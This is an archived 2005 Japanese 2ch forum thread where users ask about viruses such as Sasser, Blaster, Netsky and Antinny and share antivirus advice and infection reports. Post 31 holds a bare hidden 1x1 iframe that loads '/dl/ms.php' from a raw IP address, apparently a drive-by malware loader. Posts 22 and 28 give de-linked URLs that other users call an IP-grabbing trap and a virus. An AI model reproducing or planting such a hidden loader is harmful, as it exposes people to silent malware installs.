ウィルス情報＆質問　総合スレッド☆Part29

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 06/12 23:15 / Filesize : 322 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 [2005/03/21(月) 21:17:47 ]: ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【　　最　　重　　要　　事　　項　　】
ウィスルやブラクラだと思われる物の直リンは厳禁！！！！！！！！！！
質問の時は頭の『ｈｔ』を抜いて貼り付ける事

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください

。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

テンプレサイト（質問する前、書き込む前に必読）
コンピュータウィルス総合スレッド　テンプレミラーサイト（PC初心者板）
pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報テンプレまとめサイト（Download板）
www.geocities.jp/kemkzuenc/Antinny.html
2 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:20:41 ]: ■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです！
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう！
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■　　※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社　www.trendmicro.com/jp/home/personal.htm
　製品名：ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック　www.symantec.com/region/jp/
　製品名：NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC （バーテックスリンクより移管）
www.vintage-solutions.com/Japanese/
　製品名：ANTIDOTE （アンチドート）
・株式会社アラジンジャパン　www.aladdin.co.jp
　製品名：eSafeProtect
・コンピュータアソシエイツ株式会社　www.caj.co.jp/
　製品名：InocuLAN、CheyenneAntiVirus
・マカフィー株式会社　www.mcafee.com/jp/default.asp
　製品名：McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
　www.nai.com/japan/download/dat3end.asp　（リンク切れ）
　該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:21:48 ]: ■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
　→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意！
　→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない！
　→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう！
　→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
　→怪しいファイルにウィルスが混入しているケースもよくあることです。
　　怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を！ ■■
　もしウィルスを発見したり、感染してしまったら届け出をしましょう！
★IPAセキュリティセンター　コンピュータウイルスに関する届出について
　www.ipa.go.jp/security/outline/todokede-j.html
　こちらに届け出の方法などが記載されています。
　E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:26:32 ]: W32.Sasser.Wormとその亜種にご注意！！
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、出現後にウイルス監視ソフトの定義ファイルを更新していない場合、ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
5 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:28:01 ]: Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
6 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:29:55 ]: 「W32/Netsky」ウイルスの亜種（Netsky.Q）に関する情報
www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名：　以下のいずれかひとつ
　　* Mail Delivery System (＜受取人メールアドレス＞)
　　* Failure (＜受取人メールアドレス＞)
　　* Delivered Message (＜受取人メールアドレス＞)
　　* Deliver Mail (＜受取人メールアドレス＞)
　　* Delivery Error (＜受取人メールアドレス＞)
・添付ファイル名：　{ message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
　　　例： date7386.pif 、 message19392.zip など

「W32/Mydoom」（別名：Novarg）ウイルスに関する情報
www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス（From）：　コンピュータから取得できたアドレスを詐称。
・件名：（以下の候補のいずれかを選択）
　　* Error
　　* Status
　　* Server Report
　　* Mail Transaction Failed
　　* Mail Delivery System
　　* hello
　　* hi
　　[ 任意の文字列 ]
・本文：（以下の候補のいずれかを選択）
　　"test"
　　"The message contains Unicode characters and has been sent as a binary attachment."
　　"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
　　"Mail transaction failed. Partial message is available."
　　[ 任意の文字列 ]　　[ 空白 ]
・添付ファイル名：　ランダムなアルファベット
7 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:32:06 ]: 「がいしゅつです」Q&A
Q1．ノートンを使っていたら、２ｃｈのログからウィルスを発見しました。
　　　ノートンをインストールしたら2chに書けなくなりました。
A1．ここを読みましょう。
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2．ウィルスを検出しましたが、どんなウィルスかわかりません
A2．各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました。
　　デスクトップの背景が蓮画像になってしまいます。
A3．Winny関連ウィルスですので、Download板へどうぞ。
　　ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4．アンチウィルスソフトを持っていないのですが、無料のものはないですか？
A4．このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5．ホームページが変なページになってしまいます
A5．ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい！Part52
pc5.2ch.net/test/read.cgi/pcqa/1111405528/
8 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:33:20 ]: 関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part36
tmp4.2ch.net/test/read.cgi/download/1111385299/
sasser【スタコラサッサ】sasser　Part２
pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ　part5
pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その４】
pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイト見たら…助けて下さい！Part52
pc5.2ch.net/test/read.cgi/pcqa/1111405528/
【緊急!】ウィルス即行駆除方法【助けて!】
pc5.2ch.net/test/read.cgi/sec/1091174837/
ファイアーウォールソフト総合Part4 （DAT落ち）
pc5.2ch.net/test/read.cgi/sec/1074563750/
アンチウィルスソフトのウィルス誤検出
pc5.2ch.net/test/read.cgi/sec/1027753135/
毎日ｳｨﾙｽﾒｰﾙが送られてくるのですが･･2通目
pc5.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。

質問する前に検索しましょう
www.yahoo.co.jp/
www.google.co.jp/
9 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:36:07 ]: （一応）前スレ
ウィルス情報＆質問　総合スレッド☆Part28
pc5.2ch.net/test/read.cgi/sec/1108718666/

テンプレ終了。
貼り落とし・最新情報への更新忘れ等あった場合は随時修正願います。
10 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 21:43:41 ]: >>1
乙です。

ググったけど、英語でよくわからない！人は

Excite エキサイト翻訳英語翻訳＞ウェブページ翻訳
ttp://www.excite.co.jp/world/english/web/

を使ってみよう。
11 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/21(月) 23:40:56 ]: >>1
乙。

PC関係の用語が分からない場合は、下記のサイトでも調べて見ましょう。
・IT用語辞典e-Words
e-words.jp/
・アスキーデジタル用語辞典
yougo.ascii24.com/
12 名前：名無しさん＠お腹いっぱい。 [2005/03/22(火) 18:59:39 ]: ここで一句

人権法　政府モードで　２ちゃん削除
13 名前：名無しさん＠お腹いっぱい。 [2005/03/22(火) 19:38:53 ]: Kerio4をインストルしたんですけど、インストールしただけで、
ファイアーウォールは機能しているでしょうか？

詳しい設定方法わかる人、お願いします。
３番を見ましたがわかりませんので、簡単にお願いします。
14 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/22(火) 19:52:09 ]: >>13
機能しています。心配いりません。
15 名前：名無しさん＠お腹いっぱい。 [2005/03/22(火) 19:57:36 ]: よかった。アンインストールしようか迷ってました。
右下のアイコンにも表示されないので。

念をいれて他スレでも聞いてきます。
16 名前：名無しさん＠お腹いっぱい。 [2005/03/22(火) 20:03:31 ]: w32.hllw.antinnyに感染したのですが、すこし様子がおかしいです。
普段ならノートンで削除できるのに、なぜか削除しようと思ってもできません。
それならと直接感染ファイルを削除しようと思い、ノートンにC\:Documents and Settingsの
Ownerのフォルダにあるlocal settingというフォルダの0000000というファイルが感染しているとでたので
c→documents setting→ownerのフォルダまでいったのですが、どこにもlocal settingというフォルダがないのです。
隠しフォルダでもなさそうでした。
ちなみにノートンからフォルダ指定で絞込みのウイルススキャンするときは、このlocal settingというフォルダがでてきて選択できます（そこから削除は無理）
これはどうなってるのですか？パソコン詳しい人おしえて！
17 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/22(火) 20:15:27 ]: >>16
パスが違いますですよ。ログをよくみなおしてください。
18 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/22(火) 20:23:09 ]: >>16
>w32.hllw.antinnyに感染した
>普段ならノートンで削除できるのに
ﾀﾞｳｿ板へ(・∀・)ｶｴﾚ!
19 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/22(火) 23:11:52 ]: WindowsXPSP1、ﾉｰﾄﾝｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨを使用しています。

ネットをしようと思ってIEを立ち上げたら、アドレスの部分がずっと閉じたり開いたりを繰り返します。
また、クリックしても何の反応もありません。
一度だけですが、色々なファイルがいきなりたくさん開きだした事もあります。
その時は恐くなって電源を切ってしまいました。
対策として、LANケーブルを抜く・ノートンの更新・スキャンをしましたが
ウィルスは発見できず感染もしていませんでした。

もうどうしたらいいか、本当にわかりません。
パソコンが使えないので携帯でこちらに相談することしか思いうかびませんでした。
お力をお貸し頂けないでしょうか？
どうぞよろしくお願い致します。
20 名前：19 mailto:sage [2005/03/22(火) 23:20:04 ]: 何でかしりませんが治りました！
本当によかった…。
スレ汚し大変失礼致しました。
21 名前：名無しさん＠お腹いっぱい。 [2005/03/23(水) 04:24:21 ]: シマンテックのサービスで全部安全になったんですけど、
YahooBBシマンテックのチェックで、ものすごく無防備ですぐに進入されます
＝すごく低い、になって、

購入するページに行くように書かれていたんですけど、

何故、こんなに差があるのでしょうか？どっちが本当なんですか？
22 名前：名無しさん＠お腹いっぱい。 [2005/03/23(水) 11:43:37 ]: 〔注意〕して下さい。
ttp://alink.uic.to/user/ararara.html
これは
なんですか？？
ウィルスの類ですか？？
もしそうなら対処法教えてください。
23 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 12:29:39 ]: >>22
この板では鑑定はしない。
ラウンジ＠2ch掲示板etc3.2ch.net/entrance/の
勇気が無くて見られない画像解説スレ Part681
etc3.2ch.net/test/read.cgi/entrance/1111340653/l50へ。

ウィルスかどうかは自分でウィルススキャンして判断してください。
24 名前：２２です [2005/03/23(水) 13:01:14 ]: >>23
板違い忠告ありがとうございました。
そちらのほうで質問してきます。
25 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 13:33:20 ]: >>24
てめー！よくもやりやがったな！
これ、telenetＩＰ抜きだろ。

思わずやられちゃったよ。＿|￣|○　ｶﾞｯｸｼ
26 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 17:49:35 ]: 【使用OS】 Windows98
【WindowsUpdateしてるか】していない
【AntiVirusは何を使っているか】入っていたけど起動時間を短くするためアンインストールした
【ちゃんとUpdateしてるか】していない
【スキャンした結果（ウイルス名・発見場所）】してない
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】セーフモードでも起動不能
【何をしたらそんなことになったのか】 winnyで違法ファイルを拾って実行
【これまでにとった措置】
画面が乱れて慌てて電源ボタンを押して強制終了した。
再起動させてみると起動できなくなったので、セーフモードで起動した。
レジストリエディタを開いて、explorer.exeとkernel32.dllを検索して見つかったのを全部消した。
【その他の質問】
もうwinnyは懲り懲りです。
二度とwinnyなんてやりません。
winnyで集めてきたファイルなどは全て諦めて1からやり直します。
こうなったのは自分の責任です。
どうすればいいのか教えて下さいお願いします。
27 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 17:59:36 ]: >>26
pasokonnbukkowasitesurerutoii
28 名前：名無しさん＠お腹いっぱい。 [2005/03/23(水) 19:33:12 ]: 【使用OS】 XP
【WindowsUpdateしてるか】自動更新
【AntiVirusは何を使っているか】マカフィー
【ちゃんとUpdateしてるか】自動更新
【スキャンした結果（ウイルス名・発見場所）】発見されない
【別のオンラインスキャンしたならその結果は】発見されない（トレンドマイクロ）
【症状を具体的に、分かる限りすべて書く】今のところ無い
【何をしたらそんなことになったのか】なし
【これまでにとった措置】なし
【その他の質問】
コレを踏みました。鑑定スレでウイルスと言われましたがマカフィ無反応
スキャンしても検出なしです。何なんでしょうか
ttp://f11.aaa.livedoor.jp/~hiho/imgboard/wall/img-box/img20041127040903.jpg
29 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 20:12:27 ]: >28
ウイルス
30 名前：名無しさん＠お腹いっぱい。 [2005/03/23(水) 20:31:43 ]: ウィルスって怖い

【祭り】　同志社大女学生のハメ鳥、イケメン税務姦　７
news19.2ch.net/test/read.cgi/news/1111573789/
31 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 20:40:16 ]: <iframe src="213.159.117.133/dl/ms.php" height="1" width="1"></iframe>
32 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 20:46:23 ]: >>28
マカフィー仲間(･∀人∀･)
踏んでみましたw
マカフィーだろうがノートンだろうが、バスターだろうが今じゃどの
アンチウィルス入れ取ればWindowsUpdateちゃんとやってれば絶対に
感染なんかしない。
ただ、セキュリティの警告に「YES」を押さなければの話だけど。
（特にマカフィーはexploitウィルスに強いらしい）
33 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 21:38:49 ]: >>32
ほんとですか？！
ついさっきまでウイルス検出されないのに
感染してると思い込んでアタフタしてました
今のところPCに異常もないし
安心しました。ありがとうございました。
>>29
ありがとうございました。
34 名前：名無しさん＠お腹いっぱい。 mailto:sag [2005/03/23(水) 21:39:23 ]: 家族共有しているパソコンで
朝パソコン付けて仕事して夕方動作がおかしいと思ったらテキストファイルが
ぬるぽと書かれた123kbのファイルになってしまった。

しかも検索したらCドライブ4000のテキストファイルの内3000近くが123kbのファイルに置き換わっています

これは何が原因なのでしょうか？どう対策をとればいいのでしょうか？
35 名前：名無しさん＠お腹いっぱい。 mailto:sag [2005/03/23(水) 21:41:55 ]: あとレジストリエディタで原因を調べようとしてもメモ帳が立ち上がります。
36 名前：34 mailto:sag [2005/03/23(水) 21:50:23 ]: 【使用OS】 Windowsxppro
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】 NOD32
【ちゃんとUpdateしてるか】最近していない
【スキャンした結果（ウイルス名・発見場所）】 antinnyR.worm　別アカウントのマイドキュメント内
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】 Cドライブのテキストファイルが全て123kbになる
レジストリエディタがメモ帳になる。パソコンの速度は支障あまりなし、
テキストファイルのタイムスタンプは3/23AM9:00～PM17:00と様々全て今日発動
見慣れないファイルを触ったのは昨日の夜らしい、今日起動したのは私本人
【何をしたらそんなことになったのか】親が知らないファイルを触ったらしい
【これまでにとった措置】
何もしていない
【その他の質問】
37 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 21:55:44 ]: >>36
「PandaActiveScan」というオンラインスキャンでウイルスを駆除。
か、OS再インストールだろ
38 名前：34 mailto:sage [2005/03/23(水) 22:03:47 ]: おお、>>37さんありがとうございます

【その他の質問】ありました
ぬるぽと上書きされた、テキストデータを元のテキストデータを
元に戻すようなツールは存在しますか？それは「システムの復元」で可能ですか？
現在、心底焦っています。元に戻せない場合重要な情報が全てテキストで保管しているので
仕事に影響が出るから泣きたいです
39 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 22:06:03 ]: wrap32.exeなるファイルがZoneAlarmで検出されました。
googleで調べて見ましたが、英語サイトしか出てきません。

これは何なんでしょう？
40 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 22:22:55 ]: >>39
ttp://forums.zonelabs.com/zonelabs/board/message?board.id=win_za_msgs&message.id=8779#M8779

この人（↑）は「シマンテックが仕掛けたスパイウェア」だと言ってるが、はてさて（笑）
41 名前：34 mailto:sage [2005/03/23(水) 22:23:44 ]: 34です。写真などjpgなどは無事ですが、設定ファイルにtxtを使うツールが軒並み起動しません
ソースコードや取引先のメモなどが全滅しました。HDDを昔の状態に復旧するツールは今から買えるでしょうか？
何処かコンビニなどで入手できるでしょうか？
42 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 22:25:13 ]: >>39
ttp://forums.zonelabs.com/zonelabs/board/message?board.id=win_za_msgs&message.id=8888#M8888

ベリサインからデジタル署名を取ってくるノートンのファイルらしい
43 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 22:35:13 ]: >>41
言っておきますが
上書き方式でやられているのでサルベージは不可能です
44 名前：名無しさん＠お腹いっぱい。 [2005/03/23(水) 22:53:41 ]: 【使用OS】ＸＰ
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】してる
【スキャンした結果（ウイルス名・発見場所）】 Adware.ＣＤＴを発見。手動削除・・・ノートンさんがやってくれない！
【別のオンラインスキャンしたならその結果は】してない。。。ノートンさん信じてる
【症状を具体的に、分かる限りすべて書く】
Adware.ＣＤＴというウイルスに感染していたのと、
起動したら、いつまでもデスクトップ画面にならずに青い画面のままで
しょうがなく強制終了で、また再起動したら今度は青い画面の後復元？みたいな画面になって、ファイル先かなにかの英語がずらーっと下から上へ流れていって、或程度たったらまたもとのデスクトップ画面に戻ってこれた。
全部デリートされちゃったかとびびったけど、今のとこ大丈夫みたい

これって上のウィルスとの因果関係はある？それとも別のなにか？？
まじコピーとかされてないよね、ものすごく不安です
ﾉｰとンさんいれてるんだけど、こんな症状はじめてなんですよ
ﾉｰトンが悪いのか、それともＰＣの故障？どっちだろ
【何をしたらそんなことになったのか】
分からない、ほんと突然です。再起動したら突然なりました
【これまでにとった措置】一応上のウイルスを手動削除、あとはなにもやってません
45 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 22:55:58 ]: >>44
その前に、何か報告することがあるはずですよ。Adware.ＣＤＴでしょ？
まず、その報告をしてくださいよ。
46 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 22:58:33 ]: >>44
なにを報告？？？
47 名前：34 mailto:sage [2005/03/23(水) 23:01:09 ]: ありがとうございました。家族や私の不備が原因で全ての書類が全滅しました。
たぶん、会社との関係は悪化し、下手すれば解雇にもなりうりますが、救出不可能と
しっただけでも大きな成果です。

あきらめて、明日からの人生頑張っていきたいと思います
48 名前：34 mailto:sage [2005/03/23(水) 23:07:09 ]: コレからはまだ生きている書類、画像などをバックアップして新しく再インストールしようと思います。
Ｃドライブ全滅　Ｄドライブが無傷なのでデータを何処かに引っ越したいと思います

おそらくannttynyとやらがウイルスらしいのですが、そのウイルスファイルは
何処に潜んでいるのでしょうか？二次感染を防ぐには何処をスキャンすればいいのでしょうか？
あと情報提供してくれた皆さんありがとうございました。一泣きしたらすっきりしました
49 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 23:07:27 ]: 大事なファイルの割にはバックアップも取ってなかったのな（ｗ
50 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 23:08:48 ]: >>48
あきらめれ。一般ファイルにもまぎれて寄生してるから
全部捨てるしかないだろ。
51 名前：34 mailto:sage [2005/03/23(水) 23:23:58 ]: >>49さん　そうですな、その必要がないと思ってバックアップしなかったのは失態です
別のパソコンで書き込んでいます。お隣ではパンダアクティブスキャンがウイルスを一つ拾いました

zipファイルも全滅。2000年４月～2005年１月までの書類圧縮セットが持っていかれました。
2004年11月までは別にあるからいいけど……半在宅で仕事しているので明日会社に事情を説明します
52 名前：44 mailto:sage [2005/03/23(水) 23:31:38 ]: >>45
なにを報告？？？

それと、変になってるもの見つけた。。。
ＣＴＲＬとＤＥＬＥＴＥとＡＬＴ同時に押すとでてくる奴、あれの表示がおかしい。
右上にあるボタン群がまずない。それとＣＰＵ使用率とか切り替え表示する奴がない。
なにがタスクで作動してるか表示してるだけで、あとはなにものってない

(((( ;゜Д゜)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ　おれのＰＣどうなちゃったの？ノートンさんいれてんのに・・・
53 名前：34 mailto:sage [2005/03/23(水) 23:38:02 ]: 明日じゃ遅いと思ったので電話で報告しました。

解雇されますた。ひとまず、明日は会社に出頭してきます
Annttinyの事を持ち上げた瞬間、部長ブチ切れ。そんなに危険なウイルスとは

本当に住人のおかげで助かったというか解明できたよかった。
死のうかと思ったけど今から頑張って出来ることはやっておこうと思ったよ
就活して１年やっと巡り会えた会社だったが
54 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 23:43:16 ]: >>53
55 名前：44 mailto:sage [2005/03/23(水) 23:51:23 ]: ＷＭＩがなんたらかんたらとかいうのが頻繁におこる・・・
56 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/23(水) 23:54:40 ]: ノートンは重いし、エラーが多いからNOD32に変えたら快適だし、安心。
57 名前：　 [2005/03/24(木) 00:02:08 ]: トロイに感染したみたいです。助けて下さい。

【使用OS】 WindowsXP HomeEdition
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】使っていない。
ときどきadAwareとかを走らせているぐらい。　…すいません買います。

【スキャンした結果（ウイルス名・発見場所）】
トレンドマイクロのオンラインスキャンをしたら
TROJ_AGENT.AE \Local Settings\Temp\
TROJ_BKAZEFIND.A \Local Settings\Temp\
の二つがみつかりました。

【何をしたらそんなことになったのか】
スレに貼ってあったリンクを踏んだらアダルトサイトが開きました。

【その他の質問】
システムの復元でなおりますか？
一応やってみましたが、上の２個はスキャンしたらまた出てきました。
アンチウィルスソフトを買えば駆除できますか？

すみません、よろしくお願いします。
58 名前：名無しさん＠お腹いっぱい。 [2005/03/24(木) 00:19:03 ]: ノートン2002のLive updateができません
それとシステムの保護の有効・無効もできないんですがどうすればいいのでしょうか？
59 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 00:40:17 ]: >>57
体験版のウィルスバスターあたり落として駆除してみたらどうだ?
60 名前：58 [2005/03/24(木) 00:48:23 ]: 板違いでした
61 名前：名無しさん＠お腹いっぱい。 [2005/03/24(木) 01:07:23 ]: つーか34さん、頑張ってください。
62 名前：57 [2005/03/24(木) 01:09:11 ]: >59
レスありがとうございます。
今、とりあえず、検索してでたファイルを削除してみました。
もう１回スキャンかけてるところです。
これで出なかったら大丈夫ですか？
63 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 02:48:23 ]: お世話になります
【使用OS】ＸＰ
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】バスタ
【ちゃんとUpdateしてるか】してる
【スキャンした結果（ウイルス名・発見場所）】結果ナシ
【別のオンラインスキャンしたならその結果は】してね
【症状を具体的に、分かる限りすべて書く】質問にまとめて書きます
【何をしたらそんなことになったのか】うＰロダからＤＬやらいろいろ
【これまでにとった措置】ここ
【その他の質問】
最近、頻繁に起動後に「・・・・32dll・・なんたらかんたら」が・・・
マイクロソフトに送信しますか？という画面が出てきます
初めて出てきた後にWindowsUpdateをしたら「更新はありません」となり
何日かして自動更新したんですが相変わらず起動後に同じ場面が
出てくる時があります（毎回ではありません）
それともう一つ
気になる事があります
ＩＥのアクティブバー？というのですか？
サイトのタイトルが文字化けしていたりするのですが・・・
で、どこかのスレで似たような状況の方の書き込みに
「・・・になってるから○○で検索汁」とレスがついていた記憶が残っていますが
↑「・・・」これがどーしても思い出せない
「キーロガー」じゃなくて・・・ああぁ～思い出せないんです
どなたか宜しくお願いします
64 名前：34 mailto:sage [2005/03/24(木) 02:49:36 ]: ウイルススキャン完了。綺麗だと思われたＰＣは12の感染と7の感染疑いがでました。
削除できなかったのはシフトデリートで削除。
Virus:Bck/Iroffer.P
Virus:Trojan Horse
Spyware:Spyware/ISTbar
ただ、anthinnyが出なかったのが気がかり
rededitもないから確認できないし、何処かでDL出来るのでしょうか？
65 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 16:27:18 ]: >>63
「・・・・32dll・・なんたらかんたら」のなんたらかんたらを書け。

＞・・・になってるから○○で検索汁
「フォントキャッシュ　破損」でぐぐってみ
66 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 16:36:35 ]: >>34はantinnyがどんなものなのか理解してるのだろうか？

.....とふと思った。
67 名前：34 mailto:sage [2005/03/24(木) 16:45:15 ]: >>66さん　正直しりません！症状がファイル改ざんでないようが「ぬるぽ」で
Ｃドライブが全て感染されて、全部スキャンしたらAnntinnyというウイルスが
出てくるのかなーと思ったんです。だけど出なかったから検出されていないので
正直不安。あと明日からはハローワークにでもいかなきゃ
68 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/03/24(木) 18:45:18 ]: で、34はnyしてんのか？
